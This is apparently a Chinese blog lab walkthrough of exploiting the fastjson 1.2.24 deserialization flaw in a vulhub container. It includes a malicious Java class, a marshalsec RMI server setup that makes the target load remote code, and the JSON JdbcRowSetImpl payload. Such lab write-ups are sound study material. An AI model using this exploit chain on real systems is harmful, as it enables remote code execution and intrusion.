fastjson 1.2.24 反序列化导致任意命令执行漏洞
环境搭建vulhub一键启动
/#/environments/fastjson/1.2.24-rce/
docker-compose up -d
访问本地ip的8090端口
1.bp抓包发现对象转换成json格式数据
2.更换数据测试
右键 change request method 改成post发包,类型改为json
3.建立rmi服务器
保存java恶意代码如下,(执行 touch /tmp/success)
// javac TouchFile.javaimport java.lang.Runtime;import java.lang.Process;public class TouchFile {static {try {Runtime rt = Runtime.getRuntime();String[] commands = {"touch", "/tmp/success"};Process pc = rt.exec(commands);pc.waitFor();} catch (Exception e) {// do nothing}}}
编译代码,注意此环境需要jdk1.8环境编译,kail默认是11.0版本,需要安装jdk1.8(略),并且选择使用jdk1.8
┌──(root💀kali)-[~]└─# update-alternatives --config java有 2 个候选项可用于替换 java (提供 /usr/bin/java)。选择 路径 优先级 状态------------------------------------------------------------* 0 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111自动模式1 /usr/lib/jvm/java-11-openjdk-amd64/bin/java 1111手动模式2 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 1 手动模式要维持当前值[*]请按<回车键>,或者键入选择的编号:2update-alternatives: 使用 /usr/local/jdk1.8/jdk1.8.0_161/bin/java 来在手动模式中提供 /usr/bin/java (java)┌──(root💀kali)-[~]└─# java -version java version "1.8.0_161"Java(TM) SE Runtime Environment (build 1.8.0_161-b12)Java HotSpot(TM) 64-Bit Server VM (build 25.161-b12, mixed mode)
javac 编译生成class文件
当前目录使用python搭建web,发布编译好的文件
python3 -m http.server 8888
使用工具marshalsec 搭建rmi服务器
git clone /mbechler/marshalsec.gitcd marshalsemvn clean package -DskipTests (需要等待一会),要安装maven apt-git installmaven
我们借助marshalsec项目,启动一个RMI服务器,监听9999端口,并制定加载远程类TouchFile.class
:
需要把marshalsec-0.0.3-SNAPSHOT-all.jar拷贝到恶意代码目录
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://192.168.8.143:8888/#TouchFile" 9999
向靶场服务器发送Payload,带上RMI的地址:改为rmi服务器ip
POST / HTTP/1.1Host: your-ip:8090Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)Connection: closeContent-Type: application/jsonContent-Length: 160{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://:9999/TouchFile","autoCommit":true}}
进入容器发现tmp下有success,反序列化命令执行成功
──(root💀kali)-[~]└─# docker ps 130 ⨯CONTAINER ID IMAGECOMMAND CREATED STATUSPORTSNAMES66effc71796b vulhub/fastjson:1.2.24 "java -Dserver.addre…" 19 hours ago Up 24 minutes 0.0.0.0:8090->8090/tcp 1224-rce_web_1┌──(root💀kali)-[~]└─# docker exec -it 66effc71796b /bin/bashroot@66effc71796b:/# cd tmp/root@66effc71796b:/tmp# lshsperfdata_root tomcat-docbase.3017740528426830119.8090 tomcat.1457512698342180460.8090successtomcat-docbase.3871276941847431940.8090 tomcat.2826139588232407997.8090root@66effc71796b:/tmp#
如果觉得《fastjson 1.2.24 反序列化导致任意命令执行漏洞》对你有帮助,请点赞、收藏,并留下你的观点哦!